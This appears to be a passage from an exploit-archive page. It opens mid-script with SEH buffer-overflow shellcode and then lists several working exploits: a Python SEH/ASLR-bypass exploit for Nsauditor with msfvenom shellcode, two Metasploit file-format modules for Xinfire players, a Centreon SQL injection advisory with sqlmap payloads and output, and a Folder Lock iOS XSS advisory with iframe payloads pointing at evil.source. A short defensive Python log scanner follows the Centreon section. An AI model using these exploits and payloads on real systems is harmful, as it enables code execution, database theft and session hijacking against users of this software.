"\x2d\x16\x11" # sub eax,0x11001600
"\x6e" # venetian shellcode
"\x50" # push eax
"\x6e" # venetian shellcode
"\xc3" # retn
)

nop="\x90"*45

# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode= b""
shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62"
shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e"
shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b"
shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61"
shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61"
shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c"
shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57"
shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c"
shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31"
shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62"
shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39"
shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64"
shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31"
shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61"
shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d"
shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c"
shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b"
shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b"
shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74"
shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f"
shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b"
shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32"
shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30"
shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a"
shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58"
shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f"
shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70"
shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52"
shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53"
shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41"

payload=junk+nseh+seh+align+nop+shellcode

fill="D"*(5000-len(payload))

payload+=fill
f=open(filename,"wb")
f.write('http://'+payload)
print "\nFile created with %d bytes" % len(payload)
f.close()

Nsauditor 3.2.1.0 Buffer Overflow


Nsauditor version 3.2.1.0 SEH buffer overflow exploit with ASLR bypass.


MD5 | 2bb0827660f4b5441aa0948f60ddeda5

# Exploit Title: Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
# Date: 2020-04-17
# Exploit Author: Cervoise
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.1.0 and 3.0.28
# Tested on: Windows 10.0.18363.778 x86 Pro EN

# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES (https://www.exploit-db.com/exploits/46005)
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still vulnerable

# 1 -> Change the shellcode with the one you want
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
# 3 -> Open Nsauditor
# 4 -> In the Window select "Tools" -> "Dns Lookup"
# 5 -> Paste the content into the Field: "Dns Query'"
# 6 -> Click "Resolve"

#!/usr/bin/python3

# Badchars -> \x00\x0a\x0d\x2e\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9f\xf0\xf1\xf2\xf3\xf4\xf5\xf6
# Maybe less badchars between \x80 and \x9f but I was lazy (I just checked those I needed)

# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v shellcode
shellcode = b""
shellcode += b"\x89\xe7\xd9\xe9\xd9\x77\xf4\x59\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43"
shellcode += b"\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
shellcode += b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += b"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x6e\x62\x73"
shellcode += b"\x30\x37\x70\x75\x50\x35\x30\x6f\x79\x68\x65"
shellcode += b"\x36\x51\x6f\x30\x43\x54\x4e\x6b\x70\x50\x30"
shellcode += b"\x30\x4e\x6b\x43\x62\x56\x6c\x4c\x4b\x73\x62"
shellcode += b"\x54\x54\x6c\x4b\x61\x62\x65\x78\x36\x6f\x58"
shellcode += b"\x37\x71\x5a\x56\x46\x66\x51\x49\x6f\x6e\x4c"
shellcode += b"\x65\x6c\x51\x71\x53\x4c\x43\x32\x46\x4c\x47"
shellcode += b"\x50\x6f\x31\x4a\x6f\x66\x6d\x46\x61\x79\x57"
shellcode += b"\x69\x72\x69\x62\x46\x32\x36\x37\x4c\x4b\x63"
shellcode += b"\x62\x76\x70\x4c\x4b\x63\x7a\x45\x6c\x6e\x6b"
shellcode += b"\x72\x6c\x47\x61\x62\x58\x79\x73\x77\x38\x55"
shellcode += b"\x51\x7a\x71\x72\x71\x6e\x6b\x62\x79\x57\x50"
shellcode += b"\x37\x71\x78\x53\x4e\x6b\x57\x39\x72\x38\x5a"
shellcode += b"\x43\x54\x7a\x61\x59\x4e\x6b\x57\x44\x4c\x4b"
shellcode += b"\x45\x51\x39\x46\x30\x31\x79\x6f\x6e\x4c\x5a"
shellcode += b"\x61\x4a\x6f\x44\x4d\x63\x31\x79\x57\x76\x58"
shellcode += b"\x49\x70\x51\x65\x69\x66\x76\x63\x43\x4d\x58"
shellcode += b"\x78\x45\x6b\x51\x6d\x57\x54\x64\x35\x48\x64"
shellcode += b"\x46\x38\x6c\x4b\x42\x78\x67\x54\x36\x61\x6a"
shellcode += b"\x73\x31\x76\x6c\x4b\x44\x4c\x52\x6b\x6c\x4b"
shellcode += b"\x66\x38\x65\x4c\x57\x71\x4a\x73\x6e\x6b\x36"
shellcode += b"\x64\x4e\x6b\x47\x71\x38\x50\x6d\x59\x42\x64"
shellcode += b"\x35\x74\x51\x34\x31\x4b\x33\x6b\x70\x61\x42"
shellcode += b"\x79\x43\x6a\x50\x51\x6b\x4f\x4d\x30\x33\x6f"
shellcode += b"\x63\x6f\x43\x6a\x4e\x6b\x77\x62\x7a\x4b\x6e"
shellcode += b"\x6d\x53\x6d\x50\x6a\x67\x71\x4e\x6d\x6c\x45"
shellcode += b"\x4e\x52\x73\x30\x37\x70\x75\x50\x72\x70\x35"
shellcode += b"\x38\x46\x51\x4e\x6b\x52\x4f\x4f\x77\x4b\x4f"
shellcode += b"\x38\x55\x6f\x4b\x4c\x30\x6e\x55\x6c\x62\x71"
shellcode += b"\x46\x53\x58\x4f\x56\x6d\x45\x6d\x6d\x6d\x4d"
shellcode += b"\x39\x6f\x58\x55\x47\x4c\x44\x46\x43\x4c\x74"
shellcode += b"\x4a\x6b\x30\x49\x6b\x59\x70\x34\x35\x47\x75"
shellcode += b"\x6f\x4b\x50\x47\x56\x73\x73\x42\x70\x6f\x53"
shellcode += b"\x5a\x67\x70\x51\x43\x4b\x4f\x6b\x65\x31\x73"
shellcode += b"\x70\x61\x52\x4c\x30\x63\x73\x30\x41\x41"


# 0x006ea017 : pop esi # pop ecx # ret | startnull {PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.0.28.0 (C:\Program Files\Nsauditor\Nsauditor.exe)
# 0x006ea017 : pop esi # pop ecx # ret | startnull {PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.2.1.0 (C:\Program Files\Nsauditor\Nsauditor.exe)

pop_pop_ret = b"\x17\xa0\x6e"
jmp_back = b"\xeb\xc3\x90\x90" #JMP 0xffffffc5

# An address near the end of our buffer is on the stack; only three pops
# are needed to get it into EAX.
# Then we just have to move back to the beginning of our buffer.
# An egghunter would also do the job, but would not be compatible with all
# Windows versions.
going_back = b"\x58"           # POP EAX
going_back += b"\x58"          # POP EAX
going_back += b"\x58"          # POP EAX
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\x83\xE8\x79"  # SUB EAX,0x79
going_back += b"\xFF\xE0"      # JMP EAX

buffer = b"\x90"*(5235-len(shellcode)-len(going_back)-100)
buffer += shellcode + b"\x90"*100
buffer += going_back
buffer += jmp_back + pop_pop_ret #nSEH / SEH

# Write the exploit
file = open("nsauditor-3-2-1-exploit.txt", "wb")
file.write(buffer)
file.close()

Xinfire TV Player 6.0.1.2 Buffer Overflow


This Metasploit module exploits a buffer overflow in Xinfire TV Player Pro and Standard version 6.0.1.2. When the application is used to import a specially crafted plf file, a buffer overflow occurs, allowing arbitrary code execution. Tested successfully on Win7 and Win10. This software is similar to Aviosoft Digital TV Player and BlazeVideo HDTV Player.


MD5 | 33a2d9b521ed3ace54378cd280661908

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xinfire TV Player Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in Xinfire TV Player Pro and Standard v6.0.1.2. When
        the application is used to import a specially crafted plf file, a buffer overflow occurs
        allowing arbitrary code execution. Tested successfully on Win7, Win10. This software is similar
        to Aviosoft Digital TV Player and BlazeVideo HDTV Player.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom' # MSF Module and Vulnerability discovery
        ],
      'References'     =>
        [
          [ 'OSVDB', '' ],
          [ 'EDB', '' ],
          [ 'EDB', '' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 1384,
          'BadChars'    => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x613018E9, 'Offset' => 608 } ], # p/p/r DTVDeviceManager.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 16 2020',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ])
  end

  def exploit
    buffer = rand_text(target['Offset']) # junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded # 1384 bytes of space
    # more junk may be needed to trigger the exception

    file_create(buffer)
  end
end

Xinfire DVD Player 5.5.0.0 Buffer Overflow


This Metasploit module exploits a buffer overflow in Xinfire DVD Player Pro and Standard version 5.5.0.0. When the application is used to import a specially crafted plf file, a buffer overflow occurs, allowing arbitrary code execution. Tested successfully on Win7 and Win10. This software is similar to DVD X Player and BlazeDVD.


MD5 | f330cfe6533c1e949c1dc78a564a9526

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xinfire DVD Player Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in Xinfire DVD Player Pro and Standard v5.5.0.0. When
        the application is used to import a specially crafted plf file, a buffer overflow occurs
        allowing arbitrary code execution. Tested successfully on Win7, Win10. This software is similar
        to DVD X Player and BlazeDVD.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom' # MSF Module and Vulnerability discovery
        ],
      'References'     =>
        [
          [ 'OSVDB', '' ],
          [ 'EDB', '' ],
          [ 'EDB', '' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars'    => "\x00\x0a\x0d\x1a\x20",
          'Space'       => 1000,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x6160174F, 'Offset' => 608 } ], # p/p/r EPG.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 15 2020',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ])
  end

  def exploit
    buffer = rand_text(target['Offset']) # junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded # 1000 bytes of space
    # more junk may be needed to trigger the exception

    file_create(buffer)
  end
end

Centreon 19.10.5 SQL Injection


Centreon version 19.10.5 suffers from a remote SQL injection vulnerability.


MD5 | 010de193d62d065fbc61747d8e9253bf

# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
# Date: 2020-04-19
# Exploit Author: Basim alabdullah
# Vendor Homepage: https://www.centreon.com
# Software Link: https://download.centreon.com/
# Version: v.19.10.5
# Tested on: Centos 5


[EXECUTIVE SUMMARY]

Centreon has come a long way from its early roots. Once a user-friendly monitoring console on top of Nagios, Centreon is today a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.

Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity easily embrace Centreon for robust infrastructure, systems and network performance monitoring. It has been downloaded by hundreds and thousands of IT professionals worldwide.

The analysis discovered a time-based blind SQL injection vulnerability in the tracker functionality of the Centreon Monitoring software. A malicious user can inject arbitrary SQL commands into the application. The vulnerability lies in the project tracker service search functionality; depending on project visibility, successful exploitation may require user authentication. A successful attack can read, modify or delete data from the database or execute arbitrary commands on the underlying system.

[VULNERABLE VERSIONS]

The following version of the Centreon Monitoring was affected by the
vulnerability; previous versions may be vulnerable as well:
- Centreon version 19.10.5


[Proof of Concept]

http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23


[Payloads]

Parameter: svc_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: hid=15&svc_id=1 OR NOT 5782=5782

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)

Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
---
[12:24:35] [INFO] testing MySQL
[12:24:35] [INFO] confirming MySQL
[12:24:35] [INFO] the back-end DBMS is MySQL
[12:24:35] [INFO] fetching banner
web server operating system: Linux Red Hat
web application technology: Apache 2.4.34, PHP 7.2.24
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.1.38-MariaDB'
[12:24:35] [INFO] fetching database names
[12:24:35] [INFO] starting 4 threads
[12:24:35] [INFO] resumed: 'centreon'
[12:24:35] [INFO] resumed: 'test'
[12:24:35] [INFO] resumed: 'centreon_storage'
[12:24:35] [INFO] resumed: 'information_schema'
available databases [4]:
[*] centreon
[*] centreon_storage
[*] information_schema
[*] test
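As an added example (not part of the advisory and not Centreon's code), the following Python applies the check the makeXMLForAck.php endpoint itself needs on `hid` and `svc_id` (plain integers only) and scans constructed access-log lines for the three payload families quoted above; the log lines and all function names are this example's own.

```python
"""Added example: not part of the Centreon advisory or of Centreon's code.

The endpoint named in the advisory (makeXMLForAck.php) takes `hid` and
`svc_id`, which are numeric identifiers. Two defensive layers are shown:
an allow-list validator the endpoint should apply before touching SQL, and
a log scanner that flags the three payload families quoted above
(boolean-based, time-based, UNION) in access-log lines. The sample log
lines and all function names are constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

ENDPOINT = "makeXMLForAck.php"
INT_PARAMS = ("hid", "svc_id")

# One pattern per payload family listed in the advisory.
SQLI_SIGNATURES = {
    "boolean-based": re.compile(r"\b(or|and)\s+(not\s+)?\d+\s*=\s*\d+", re.I),
    "time-based": re.compile(r"\bsleep\s*\(", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}


def validate_ack_params(query: str) -> dict:
    """Return {name: int} when every required parameter is exactly one
    plain decimal integer; raise ValueError otherwise. This is the check
    (or a bound parameter) the endpoint needs before building its query."""
    params = parse_qs(query, keep_blank_values=True)
    out = {}
    for name in INT_PARAMS:
        values = params.get(name)
        if not values or len(values) != 1:
            raise ValueError(f"{name}: missing or repeated")
        if not re.fullmatch(r"\d{1,10}", values[0]):
            raise ValueError(f"{name}: not a plain integer: {values[0]!r}")
        out[name] = int(values[0])
    return out


def classify_request(url: str) -> list:
    """Return the names of the signature families matching the decoded
    query string of a request URL (empty list: nothing matched)."""
    query = unquote_plus(urlsplit(url).query)
    return [name for name, rx in SQLI_SIGNATURES.items() if rx.search(query)]


def scan_access_log(lines):
    """Yield (client, findings, url) for combined-format log lines that hit
    the endpoint and either match a signature or fail parameter validation."""
    line_rx = re.compile(
        r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = line_rx.match(line)
        if not m:
            continue
        client, url = m.groups()
        if ENDPOINT not in url:
            continue
        findings = classify_request(url)
        try:
            validate_ack_params(urlsplit(url).query)
        except ValueError as exc:
            findings.append(f"invalid-param ({exc})")
        if findings:
            yield client, findings, url


# Constructed sample: one benign request, then the advisory's three payload
# shapes as a browser or sqlmap would URL-encode them.
BASE = "/centreon/include/monitoring/acknowlegement/xml/broker/" + ENDPOINT
SAMPLE_LOG = [
    f'10.0.0.5 - - [19/Apr/2020:12:24:30 +0000] "GET {BASE}?hid=15&svc_id=1 HTTP/1.1" 200 512',
    f'10.0.0.9 - - [19/Apr/2020:12:24:35 +0000] "GET {BASE}?hid=15&svc_id=1%20OR%20NOT%205782=5782 HTTP/1.1" 200 512',
    f'10.0.0.9 - - [19/Apr/2020:12:24:36 +0000] "GET {BASE}?hid=15&svc_id=1%20AND%20(SELECT%201615%20FROM%20(SELECT(SLEEP(5)))TRPy) HTTP/1.1" 200 512',
    f'10.0.0.9 - - [19/Apr/2020:12:24:42 +0000] "GET {BASE}?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, findings, url in scan_access_log(SAMPLE_LOG):
        print(client, findings)
```

The benign first line is never reported, while each of the three payload lines is flagged both by its signature and by the integer check, which is the layer that would have blocked the injection regardless of the payload shape.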

Folder Lock 3.4.5 Cross Site Scripting


Folder Lock version 3.4.5 for iOS suffers from multiple cross site scripting vulnerabilities.


MD5 | dc570d27083f0ad0330ce7c6d87b1b60

Document Title:
===============
Folder Lock v3.4.5 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2210


Release Date:
=============
2020-04-20


Vulnerability Laboratory ID (VL-ID):
====================================
2210


Common Vulnerability Scoring System:
====================================
4.2


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Folder Lock lets you password-protect your personal files, photos,
videos, documents, contacts, wallet cards, notes and
audio recordings in your iPhone. Apart from being a perfect data
security app, Folder Lock is a perfect WiFi manager
app too, as you can transfer files from your iPhone to PC, or vice
versa, wireless via Folder Lock. Its WiFi Music Manager
feature allows you the options of audio import, music import, song
import and mp3 import without using iTunes.

(Copy of the Homepage:
https://apps.apple.com/us/app/folder-lock/id372925917 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Folder Lock v3.4.5 mobile iOS application.


Affected Product(s):
====================
NewSoftwares.net
Product: Folder Lock v3.4.5 - Apple iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
Multiple persistent cross site scripting vulnerabilities have been
discovered in the official Folder Lock v3.4.5 mobile iOS application.
The vulnerability allows remote attackers to inject their own malicious
script code with a persistent attack vector to compromise
browser-to-web-application requests from the application side.

The persistent input validation vulnerability is located in the `create`
module's `Create Folder` function. Remote attackers are able to inject
their own malicious persistent script code as the path or folder name.
After the injection the code executes persistently from the application
side. The request method to inject is POST and the attack vector is
located on the application side. The injection point is the create folder
function and the execution point is any path/file index directory listing
in the preview.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Function(s):
[+] Create Folder

Vulnerable Module(s):
[+] path



1.2
Multiple non-persistent cross site scripting vulnerabilities have been
discovered in the official Folder Lock v3.4.5 mobile iOS application.
The vulnerabilities allow remote attackers to inject their own malicious
script code with a non-persistent attack vector to compromise
browser-to-web-application requests from the client side.

The non-persistent cross site scripting vulnerabilities are located in
the `path` parameter of the `list` and `download` modules.
Remote attackers are able to inject their own malicious script code into
client-side requests with a non-persistent attack vector.
The request method to inject is GET and the attack vector is located on
the client side. The injection point is the vulnerable `path` parameter
and the execution occurs in the unsanitized error exception output
message.

Successful exploitation of the vulnerability results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to malicious source and non-persistent manipulation of
affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./list
[+] ./download

Vulnerable Parameter(s):
[+] path


Proof of Concept (PoC):
=======================
1.1
The persistent input validation web vulnerability can be exploited by
remote attackers with access to the WiFi web UI and with low user
interaction. For a security demonstration, or to reproduce the
vulnerability, follow the provided information and steps below.


PoC: Vulnerable Source
<ol class="breadcrumb" id="path" style="cursor: pointer;"><li
data-path="/"><a>IOS-DEVICENAME</a></li><li data-path="/Audios/">
<a>Audios</a></li><li class="active">test"><iframe src="evil.source"
onload="alert(document.domain)"></li></iframe></li></ol>


--- PoC Session Logs (POST) --- [Create Folder]
http://localhost/create
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 89
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
path=/Audios/test"><iframe src=evil.source onload=alert(document.domain)>
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 2
Content-Type: application/json
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close


Reference(s):
http://localhost/create



1.2
The non-persistent cross site scripting vulnerabilities can be exploited
by remote attackers with access to the WiFi web UI and with low user
interaction. For a security demonstration, or to reproduce the
vulnerability, follow the provided information and steps below.


PoC: Vulnerable Source
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>HTTP
Error 404</title></head><body><h1>
HTTP Error 404: <iframe src=evil.source onload=alert(document.domain)>
does not exist</h1><h3></h3></body></html>


--- PoC Session Logs (GET) --- [List Error Exception]
http://localhost/list?path=>"<iframe src=evil.source
onload=alert(document.domain)>
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Content-Length: 237
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://localhost/list?path=%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.domain)%3E
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close
Date: Tue, 14 Apr 2020 17:53:23 GMT

--- PoC Session Logs (GET) --- [Download Error Exception]
http://localhost/download?path=>"<iframe src=evil.source
onload=alert(document.domain)>
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Content-Length: 237
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://localhost/download?path=%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.domain)%3E
Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close

References:
http://localhost/list?path=
http://localhost/download?path=


Security Risk:
==============
1.1
The security risk of the persistent input validation web vulnerability in
the create folder function is estimated as medium.

1.2
The security risk of the client-side cross site scripting web
vulnerabilities in the path parameter is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
